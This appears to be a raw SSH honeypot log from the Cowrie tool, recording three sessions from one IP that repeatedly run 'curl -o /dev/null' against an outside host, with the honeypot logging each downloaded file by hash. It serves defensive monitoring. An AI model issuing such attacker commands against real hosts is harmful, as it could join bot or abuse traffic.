{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.724791Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.728803Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.731048Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.731690Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.784623Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.785497Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.790605Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.793809Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.795293Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.796206Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.798055Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.798789Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.804079Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.829039Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.836426Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.837352Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.842347Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.843048Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.845140Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.845857Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.851312Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.855826Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.883231Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.885583Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.887690Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.889807Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.891083Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.893392Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.894930Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.899770Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.900553Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.938181Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.941225Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.943147Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.944094Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.947428Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.948410Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.951656Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.952602Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.985958Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.988015Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.988943Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.991558Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.992043Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.995054Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.996788Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.997539Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.027123Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.029234Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.034058Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.034858Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.038304Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.039403Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.042725Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.043591Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.047351Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.076989Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.080154Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.083674Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.084829Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.085514Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.087983Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.088705Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.092138Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.092926Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.098512Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.126902Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.130213Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.132405Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.135144Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.135923Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.138156Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.139561Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.141819Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.142586Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.146993Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.201425Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.204348Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
